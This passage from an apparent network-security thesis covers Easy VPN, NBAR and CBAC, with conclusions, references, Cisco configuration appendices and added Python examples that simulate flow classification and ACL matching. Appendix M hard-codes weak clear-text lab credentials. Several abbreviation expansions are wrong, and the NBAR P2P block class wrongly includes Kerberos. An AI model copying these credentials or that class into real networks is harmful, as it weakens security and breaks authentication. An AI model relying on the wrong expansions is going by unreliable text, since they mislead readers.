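    return "drop" if classify_payload(payload) in drop_classes else "permit"


# Constructed first packets of five flows, all sent by an inside host.
FLOWS = {
    "tracker announce on 80": (80, b"GET /announce?info_hash=%AA%BB&peer_id=-AZ2060-abc"
                                   b"&port=80 HTTP/1.1\r\nHost: tracker.example\r\n\r\n"),
    "peer handshake on 80": (80, BT_HANDSHAKE + b"\x00" * 8 + b"\xaa" * 20 + b"-AZ2060-" + b"x" * 12),
    "web page on 80": (80, b"GET /index.html HTTP/1.1\r\nHost: www.example\r\n\r\n"),
    "tls on 443": (443, b"\x16\x03\x01\x00\x8b\x01\x00\x00\x87\x03\x03"),
    "ssh on 22": (22, b"SSH-2.0-OpenSSH_8.9\r\n"),
}


def demo() -> dict:
    """(port-only decision, NBAR-style decision) for each constructed flow."""
    return {name: (port_only_policy(port, payload), nbar_policy(port, payload))
            for name, (port, payload) in FLOWS.items()}


if __name__ == "__main__":
    for name, decisions in demo().items():
        print(f"{name:24s} port-only={decisions[0]:6s} nbar={decisions[1]}")
```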


6.6 Implementing Cisco Easy VPN Server

In the demonstration of site-to-site VPN connections, the two sites BO and HQ transferred data using encryption; an intruder was able to sniff it but not to understand the real contents. Using CBAC, DoS and DDoS attacks were also mitigated. Now BO and HQ can communicate with each other, and communication from outside the network is totally forbidden.

Headquarters users also have access to the internet. Since branch office users are allowed into the headquarters network, it is also possible for them to browse the internet. The headquarters wants to restrict this access and allow only certain users to reach the internet. Normally both sites can transfer data securely using the site-to-site VPN, but if any client wants to access the internet, the Easy VPN server can restrict them and allow access only if they provide a valid username and password.

Before implementing Easy VPN, an important question arises: how can a client connect to the VPN server? This is done by installing the Cisco Easy VPN Client, which can be downloaded from Cisco's site.

The head office will act as the Easy VPN server, and clients from the head office and the branch office will use the Easy VPN client to connect to the internet. See Appendix M for details.

The interface pointing towards the internet was configured to deny all traffic from any source to any destination. A local pool was created, and only addresses from this pool are allowed to forward traffic through this interface. Clients in the branch and head office can forward traffic between each other, but if they try to open a web browser or anything else, their request is not served.

In order to connect to the internet, they must have proper permission from the administrator. An administrator can create a username and password entry in the router database, and these credentials must be provided in the Easy VPN client in order to connect to the internet. The following screenshot shows the username and password challenge issued by the server.


Figure 13: Username and password challenge for EASY VPN client

At this point, a client must enter the correct credentials before accessing the internet. An important point to note is that after the client provides the correct credentials, the client sees a new virtual adapter with a new IP address. From then on the physical interface is used only to keep the connection alive, while the actual data forwarding takes place through the virtual adapter. If a client tries to spoof an IP address through his physical interface, it will not succeed, because the server has no entry for that address (the client is not connected with it) and the internet-facing interface treats the packet as coming from an address outside the local pool. The connection setup and the data transfer, until the connection is torn down, are carried in an encrypted session, and an intruder sitting in the middle of the communication will get the same result as demonstrated above for the telnet session.
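The following added example (Python, not the thesis authors' or Cisco's code) parses the two access-list 150 lines from Appendix M and evaluates them with Cisco wildcard-mask semantics, showing why a packet sourced from the pool address is forwarded while one sent from the client's physical adapter address is not; the client addresses and the destination 203.0.113.10 are constructed.

```python
import ipaddress

# The outbound ACL from Appendix M, applied with 'ip access-group 150 out'
# on the internet-facing interface: only the Easy VPN pool may leave.
ACL_150 = """
access-list 150 permit ip 10.1.1.0 0.0.0.255 any
access-list 150 deny ip any any
"""


def _addr_spec(tokens: list, i: int) -> tuple:
    """Consume one Cisco address spec: 'any', 'host A.B.C.D' or 'A.B.C.D wildcard'.
    Returns (base address, wildcard mask, index of the next token)."""
    if tokens[i] == "any":
        return 0, 0xFFFFFFFF, i + 1
    if tokens[i] == "host":
        return int(ipaddress.IPv4Address(tokens[i + 1])), 0, i + 2
    return (int(ipaddress.IPv4Address(tokens[i])),
            int(ipaddress.IPv4Address(tokens[i + 1])), i + 2)


def parse_acl(text: str) -> list:
    """Parse extended 'access-list N permit|deny PROTO SRC DST' lines."""
    entries = []
    for line in text.strip().splitlines():
        tok = line.split()
        if len(tok) < 6 or tok[0] != "access-list":
            continue
        number, action, proto = int(tok[1]), tok[2], tok[3]
        src, src_wc, i = _addr_spec(tok, 4)
        dst, dst_wc, _ = _addr_spec(tok, i)
        entries.append((number, action, proto, src, src_wc, dst, dst_wc))
    return entries


def _matches(addr: str, base: int, wildcard: int) -> bool:
    # Cisco wildcard bits set to 1 are "don't care"; 0 bits must match exactly.
    care = ~wildcard & 0xFFFFFFFF
    return (int(ipaddress.IPv4Address(addr)) & care) == (base & care)


def evaluate(entries: list, src: str, dst: str, proto: str = "tcp") -> str:
    """First matching entry wins; every Cisco ACL ends with an implicit deny."""
    for _, action, p, base_s, wc_s, base_d, wc_d in entries:
        if p != "ip" and p != proto:
            continue
        if _matches(src, base_s, wc_s) and _matches(dst, base_d, wc_d):
            return action
    return "deny"


def demo() -> dict:
    """Section 6.6 cases: a logged-in client sends from its pool address; a client
    that skipped the Easy VPN login, or spoofs through its physical adapter, does not.
    The ACL permits the whole 10.1.1.0/24 even though the pool ends at 10.1.1.100."""
    acl = parse_acl(ACL_150)
    internet = "203.0.113.10"    # constructed destination (documentation range)
    return {
        "pool client 10.1.1.7": evaluate(acl, "10.1.1.7", internet),
        "physical adapter 192.168.2.50": evaluate(acl, "192.168.2.50", internet),
        "outside the pool 10.1.2.5": evaluate(acl, "10.1.2.5", internet),
        "in the /24 but beyond the pool 10.1.1.200": evaluate(acl, "10.1.1.200", internet),
    }


if __name__ == "__main__":
    for case, decision in demo().items():
        print(f"{case}: {decision}")
```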

6.7 Conclusion

It is always good practice to encrypt data from the local station to the server. As seen in the demonstration above, an intruder was sitting between the two sites to capture data but, because of the encryption, did not succeed. It is also necessary to allow only trusted sites inside your network and block everything else. Since strictly blocking everything would hamper the normal functioning of the network, CBAC can be used to address this by allowing only trusted, internally generated traffic to find its way back in. This prevents uninvited traffic from entering the network. Allowing or denying an application by blocking certain ports is not a feasible option, as many applications can tunnel their way out using dynamic ports. NBAR can play a role here, as it permits or denies based on inspecting the packets. Finally, implementing the Easy VPN server gives administrators a robust way to verify clients before letting them in or out of the network.


7 Conclusion and future work

In this thesis, we studied different ways of compromising a network and how to mitigate the attacks. It is not only vital to know the holes and weaknesses in a network, but also useful to know how these holes are attacked. Attacking a network once it is built gives us a better idea of how to stop unwanted or malicious traffic from entering the network.

There are different methods that an attacker can use to compromise a network. It is not enough to learn about all the threats theoretically; using them and analysing their severity is of major importance. We used many tools and techniques, from wireless networks to wired networks, found the common attacks and then presented the strategy for alleviating them.

Finally, we carried out case studies addressing Layer 2 and Layer 3 security issues and implemented the tools used for preventing such problems. We also recommended some approaches that may prove helpful in certain circumstances.

This work can be further extended by taking Layer 4 security threats into consideration. Since most networks face the menace of viruses, worms and Trojans, it is highly recommended to continue our work in this area.


8 Abbreviations

IPS Intrusion prevention system

IDS Intrusion Detection System

EAP Extended Authentication Protocol

EAPOL EAP over LAN

WEP Wired Equivalence Privacy

WPA Wifi Protected Appliances

SSL Secure Socket Layer

MAC Medium Access Control

DHCP Dynamic host configuration protocol

BPDU Bridge Protocol Data Unit

RIP Routing Information Protocol

CBAC Content Based Access System

VPN Virtual Private Network

NBAR Network Based Access Recognition


9 References

1. Houle, K.J. and Weaver, G.M. (2001), "Trends in Denial of Service Attack Technology", CERT Coordination Center

2. Alfonsi, B.J. (2004), "E-voting advocates hold out hope", IEEE Educational Activities Department, Piscataway, NJ, USA, Volume 5, Issue 3, ISSN 1541-4922

3. Kong, H.S., Zhang, M.Q., Tang, J. and Luo, C.Y. (2009), "The Research of Simulation for Network Security Based on System Dynamics", Information Engineering University, Institute of Electronic Technology, Zhengzhou, China, IAS, vol. 2, pp. 145-148

4. Warfield, M.H. (2003), "Security implication of IPv6", Internet Security Systems

5. "Church of Wifi WPA-PSK Rainbow Tables", http://www.renderlab.net/projects/WPA-tables/, 2010-02-07

6. Song, D., "dsniff" (CAM table overflow)

7. "What Is Hacktivism? 2.0", http://www.thehacktivist.com/, 2010-02-07

8. Simone, M.P. (2009), "Perimeter Defences-in-Depth with Cisco ASA", SANS Institute Reading Room

9. "An Easier Way to Deploy NAC", Network Admission Control for 802.1x deployment

10. "coWPAtty MAIN", password cracking tool for wireless networks, http://wirelessdefence.org/Contents/coWPAttyMain.htm, 2010-02-07

11. "rinetd", a tool for redirecting ports, http://www.boutell.com/rinetd/, 2010-02-07

12. "PingOfDeath-Jolt.c", launching the ping of death attack, http://infinityexists.com/downloads/PingOfDeath-Jolt.c, 2010-02-07

13. "What is OpenVPN", http://openvpn.net/, 2010-02-07

14. Morgan, S. (2009), "Ethical Hacking – White Hat Hackers Top 1000 Despite Critics", http://www.pressabout.com/ethical-hacking-white-hat-hackers-20696/, 2010-02-07

15. Grand, J. (2006), Communications of the ACM, Special Issue: Hacking and innovation, ACM, New York, NY, USA, pp. 44-49

16. Ferguson, P. and Huston, G. (1998), "What is a VPN?", white paper, Cisco Systems and Telstra Internet, Revision 1

17. Bittau, C.A., Handley, M. and Lackey, J. (2006), "The Final Nail in WEP's Coffin", University College London

18. "Ubuntu", Linux distribution

19. Naamany, A.M.A., Shidhani, A.A. and Bourdoucen, H. (2006), "IEEE 802.11 Wireless LAN Security Overview", IJCSNS International Journal of Computer Science and Network Security, vol. 6, No. 5B, p. 138

20. "Cain & Abel", tool for performing man-in-the-middle attacks

21. "NG-0.7.3", packet sniffing tool for Linux

22. "DOS", script for denial of service attack, Invasion Power Board, http://www.governmentsecurity.org/forum/index.php?showtopic=19131, 2010-02-07

23. Savage, M. (2000), "Survey Shows Growing Losses From Cyber Crime", CRN, http://www.crn.com/security/18807629;jsessionid=02QZ4N4RWE20JQE1GHRSKH4ATMY32JVN

24. "AIRCRACK-NG", tool for cracking wireless networks

25. "Securing WLANs: A Bluesocket Perspective on WPA and 802.1x solutions WPA and 802.11i", http://www.mobileinfo.com/PDF/WPAand80.pdf, 2010-02-07

26. "Wireshark", packet sniffing for Windows

27. "Cisco Easy VPN", http://www.cisco.com/en/US/products/sw/secursw/ps5299/index.html, 2010-02-07

28. "2004 CSI/FBI Computer Crime and Security Survey", Computer Security Institute, http://www.crime-research.org/news/11.06.2004/423/, 2010-02-07

29. Qu, Z.M. and Wang, X.L. (2009), "Digital Object Identifier", Volume 4, Business and Information Management

30. "EC-Council", Becoming Certified Ethical Hacker

31. Ohigashi, T. and Morii, M. (2008), "A Practical Message Falsification Attack on WPA", IEEE Xplore

32. "vmware", a tool for creating virtual machines

33. "nmap", a tool for scanning active ports on the network

34. "Vomit - voice over misconfigured internet telephones", a tool for copying IP telephony conversations

35. "The FreeRADIUS Project", server for remote login authentication

36. Paul, B. (2001), "Evaluation of security risks associated with networked information systems", RMIT University Business

37. Graham, R. (2007), "SideJacking with Hamster", a tool for session hijacking

38. "Cisco Response to Dictionary Attacks on Cisco LEAP", Cisco Systems, http://www.cisco.com/warp/public/cc/pd/witc/ao350ap/prodlit/2331_pp.pdf, 2010-02-07

39. "Black Hat", criminal hackers, http://www.blackhat.com/, 2010-02-07

40. "IIS", web server for Windows networks

41. Kac, M.B. and Rindflesch, T.C. (1998), "Coordination in reconnaissance-attack parsing", Association for Computational Linguistics, Morristown, NJ, USA

42. Rodman, J. (2008), "Audio Electronics and the 'Mobile Phone Buzz'", Polycom

43. "PEAP-MS-CHAP v2", Microsoft version of EAP for 802.1x authentication

44. "DES/3DES/AES VPN Encryption Module (AIM-VPN/HPII, AIM-VPN/BPII Family)", http://www.cisco.com/en/US/docs/ios/12_2/12_2z/12_2zj/feature/guide/gtaimvpn.html, 2010-02-07

45. "SMAC 2.0 MAC Address Changer", a tool for changing the MAC address on Windows systems

46. "Hping", a tool for TCP SYN flooding

47. "Cisco 7513/7576 Blower Module Replacement Instructions", http://www.cisco.com/en/US/products/hw/routers/ps359/prod_installation_guide09186a00800fd155.html, 2010-02-07

48. Otel, F.D. (2001), "A layered approach to computer network security", Technical Report No. 369L, Department of Computer Engineering, Chalmers University of Technology

49. Harris, S., Harper, A., Eagle, C. and Ness, J. (2007), "Gray Hat Hacking: The Ethical Hacker's Handbook", Second edition

50. Hakim, M.J., Azlan, J.Y. and Zuraidah, S. (2007), "A Comparative Study on 'Harmful Phreaking' vs 'Harmless Phreaking'", Palace Hotel, Bangkok, Thailand

51. "Kon-bot", password recovery tool for Windows

52. Watkins, M. and Wallace, K., "CCNA Security Official Exam Certification Guide", CCIE No. 7945

53. "Spanning Tree PortFast BPDU Guard Enhancement", Document ID 10586, Cisco, http://www.cisco.com/en/US/tech/tk389/tk621/technologies_tech_note09186a008009482f.shtml, 2010-02-07

54. Hucaby, D. (2007), "CCNP Self-Study CCNP BCMSN Official Exam Certification Guide", Fourth Edition, CCIE Press, No. 4594

55. "Cisco Response to Dictionary Attacks on Cisco", http://www.cisco.com/en/US/products/hw/wireless/ps430/prod_bulletin09186a00801cc901.html, 2010-02-07

56. "PEAP", modified version of EAP, http://technet.microsoft.com/en-us/library/cc757996(WS.10).aspx, 2010-02-07

57. "HOW TO: Install Imported Certificates on a Web Server in Windows Server 2003", http://support.microsoft.com/kb/816794, 2010-02-07

58. "IAS as a RADIUS server design considerations", http://technet.microsoft.com/en-us/library/cc757665(WS.10).aspx, 2010-02-01

59. "McAfee", http://www.mcafee.com/us/local_content/white_papers/wp_intruvertnextgenerationids.pdf, 2010-01-15

60. "Script kiddie", http://www.wordspy.com/words/scriptkiddie.asp, 2010-02-07

61. "Nessus", tool for security audit of the network, http://www.nessus.org/nessus/, 2010-02-07


10 Appendix

Appendix A: Site to Site VPN

This configuration should exist on both routers. Apart from the interface address, the peer address and the mirrored access list, it must be exactly the same on both sides, otherwise the connection will not form.

! Phase 1 (ISAKMP) policy: pre-shared key, AES, SHA, DH group 5
crypto isakmp policy 10
 authentication pre-share
 encr aes
 hash sha
 group 5
crypto isakmp key 0 sharedsecret address <IP of the other side>
! Phase 2 (IPsec) transform: AES encryption with SHA-HMAC integrity
crypto ipsec transform-set mytrans esp-aes esp-sha-hmac
crypto map mymap 10 ipsec-isakmp
 set peer <address of the other side>
 match address 101
 set transform-set mytrans
interface fastethernet 0/1
 ip address 192.168.2.1 255.255.255.0
 crypto map mymap
! access-list 101 selects the traffic to encrypt; the masks are Cisco wildcard masks (0.0.0.255 for a /24)
access-list 101 permit ip <source network> <source wildcard-mask> <destination network> <destination wildcard-mask>

Appendix B: Classic firewalls / CBAC

Check where to apply the rules. The inside network will be allowed to reach the outside network, but the outside network will not be allowed to get inside.

First, an inspection rule is needed, applied inbound on the inside interface.

ip inspect name CBAC telnet
ip inspect name CBAC tcp
ip inspect name CBAC udp
ip inspect name CBAC icmp
interface fastethernet 0/0
 ip inspect CBAC in

Next, apply a restrictive access list inbound on the outside interface; CBAC opens temporary holes in it for the return traffic of inspected sessions.

access-list 101 deny ip any any
interface fastethernet 0/1
 ip access-group 101 in

Appendix C: Protecting CAM Overflow

Note down the interfaces that are connected to clients. This configuration does not apply to trunk ports. Go to interface configuration mode and type the following commands.

interface fastethernet 0/1
 switchport mode access
 switchport port-security
 switchport port-security maximum 5
 switchport port-security mac-address sticky
 switchport port-security violation shutdown

Appendix D: Root Guard

Go into interface configuration mode on the interface where you want to apply root guard and type the following command.

 spanning-tree guard root

Appendix E: BPDU Guard

 spanning-tree portfast
 spanning-tree bpduguard enable

Appendix F: Disable Auto Negotiation

Check which interfaces are going to be trunks. Switch-to-switch and switch-to-router links are trunk ports. Convert all these ports to trunk mode.

 switchport mode trunk

Convert the non-trunk ports to access mode and make sure that no port is left in auto-negotiation mode.

 switchport mode access

Appendix G: DHCP Snooping

In global configuration mode, type the following to enable DHCP snooping.

ip dhcp snooping

Then, in interface configuration mode, mark only the port facing the DHCP server as trusted; all other ports remain untrusted and DHCP server replies on them are dropped.

 ip dhcp snooping trust

Appendix H: Switch configuration for 802.1x

aaa new-model
aaa authentication dot1x default group radius
! enable 802.1x globally before it takes effect on any port
dot1x system-auth-control
radius-server host 192.168.1.2 key sharedsecret
interface fastethernet 0/2
 dot1x port-control auto

Appendix I: Rapid Spanning Tree Protocol

spanning-tree mode rapid-pvst
interface fastethernet 0/3
 spanning-tree portfast

Appendix J: Voice Vlan for IP Telephony

Configure one extra VLAN on the switch, which will be used by IP telephony.

vlan 10
 name voice
 exit
interface fastethernet 0/1
 switchport mode access
 switchport voice vlan 10

Appendix K: Limit CPU Process

interface range fastethernet 0/1 - 15
 process cpu limit percent 30

Appendix L: NBAR

ip cef
class-map match-any P2P
 match protocol bittorrent
 match protocol gnutella
 match protocol kazaa2
 match protocol kerberos
policy-map P2P_BLOCK
 class P2P
  drop
interface FastEthernet0/0
 service-policy input P2P_BLOCK

Appendix M: Implementing CISCO EASY VPN Server

hostname HQ
enable secret 5 $1$UTZY$Z8Q9MnjI2MwtnHahQfDIx1
aaa new-model
aaa authentication login VPNAUTH local
aaa authorization network VPNAUTH local
ip cef
! lab user account; password 0 stores the credential in clear text
username cisco privilege 15 password 0 cisco
crypto isakmp policy 10
 encr aes
 authentication pre-share
 group 2
crypto isakmp key secretpass address 192.168.2.1
! group policy pushed to Easy VPN clients: addresses come from VPNPOOL
crypto isakmp client configuration group CISCOGROUP
 key CISCOGROUP
 pool VPNPOOL
 max-logins 1
 netmask 255.255.255.0
crypto ipsec transform-set mytrans esp-aes esp-sha-hmac
crypto dynamic-map mymap 10
 set transform-set mytrans
 reverse-route
! XAUTH: clients must log in with a username/password from the local database
crypto map mymap client authentication list VPNAUTH
crypto map mymap isakmp authorization list VPNAUTH
crypto map mymap client configuration address respond
crypto map mymap 10 ipsec-isakmp dynamic mymap
interface Loopback0
 ip address 192.168.3.1 255.255.255.0
 crypto map mymap
interface FastEthernet0/0
 ip address dhcp
 duplex auto
 speed auto
 ip access-group 150 out
interface FastEthernet0/1
interface GigabitEthernet1/0
 ip address 192.168.2.3 255.255.255.0
 negotiation auto
ip local pool VPNPOOL 10.1.1.1 10.1.1.100
ip route 0.0.0.0 0.0.0.0 192.168.0.1
! only traffic sourced from the VPN pool may leave towards the internet
access-list 150 permit ip 10.1.1.0 0.0.0.255 any
access-list 150 deny ip any any